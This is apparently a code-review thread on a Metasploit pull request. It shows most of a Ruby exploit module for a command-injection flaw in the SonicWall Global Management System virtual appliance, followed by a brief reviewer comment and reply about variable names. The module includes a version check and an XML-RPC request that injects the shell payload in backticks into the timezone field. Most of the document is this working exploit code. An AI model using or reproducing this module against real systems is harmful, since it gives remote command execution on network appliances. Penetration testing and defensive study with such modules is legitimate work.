modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb

```diff
@@ -0,0 +1,136 @@
+        requests to port 21009 of the virtual app. After the XML-RPC call
+        is made, a shell script is called like so:
+        'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Michael Flanders', #MSF Module
+                    'kernelsmith' #Advisor
+                  ],
+      'References' => [
+        ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
+        ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
+      ],
+      'Platform' => [ 'unix' ],
+      'Arch' => ARCH_CMD,
+      'Targets' => [
+        [ 'SonicWall Global Management System Virtual Appliance', {} ],
+      ],
+      'Payload' => {
+        # Can't use ampersand, Java's XML-RPC parser will complain and return an error
+        'BadChars' => "\x26",
+         'Compat' => {
+           'PayloadType' => 'cmd',
+           'RequiredCmd' => 'generic bash telnet'
+         }
+      },
+      'DisclosureDate' => "Jul 22 2016",
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
+                                             Defaults to 80/443 depending on SSL.'])
+        ], self.class
+      )
+  end
+
+  def check
+    if datastore['WEB_SERVER_PORT']
+      port_number = datastore['WEB_SERVER_PORT']
+    else
+      port_number = datastore['SSL'] ? '443' : '80'
+    end
+
+    handler = datastore['SSL'] ? 'https' : 'http'
+
+    res = request_url("#{handler}://#{datastore['RHOST']}:#{port_number}")
+    if res && res.code == 200
+      if res.body =~ /<TITLE>.+v(\d\.\d)/
+        maj_ver, min_ver = $1.split('.').map { |x| x.to_i }
+        if maj_ver <= 7
+          Exploit::CheckCode::Vulnerable
+        elsif maj_ver >= 8
+          if min_ver <= 1
+            Exploit::CheckCode::Vulnerable
+          else
+            Exploit::CheckCode::Safe
+          end
+        end
+      else
+        Exploit::CheckCode::Unknown
+      end
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+
+
+  def send_xml
+    xml_body = <<~HERESTRING
+    <?xml version="1.0" encoding="UTF-8"?>
+    <methodCall>
+      <methodName>set_time_config</methodName>
+      <params>
+        <param>
+          <value>
+            <struct>
+              <member>
+                <name>timezone</name>
+                <value>
+                  <string>"`#{payload.encoded}`"</string>
+                </value>
+              </member>
+            </struct>
+          </value>
+        </param>
+      </params>
+    </methodCall>
+    HERESTRING
+
+    res = send_request_raw({
+      'method'  => 'POST',
+      'uri'     => '/',
+      'data'    => xml_body,
+      'headers' => {
+        'Content-Type' => 'text/xml'
+      }
+    })
+
+    unless res || res.body =~ /success/
+      print_error("Error sending XML to #{datastore['RHOST']}#{datastore['RPORT']}")
```

Comment:
You should be able to access `rhost` and `rport` variables directly:

```ruby
      print_error "Error sending XML to #{rhost}:#{rport}"
```

Reply:
Switched all references to #{datastore['RHOST']} and #{datastore['RPORT']} to the above specified vars.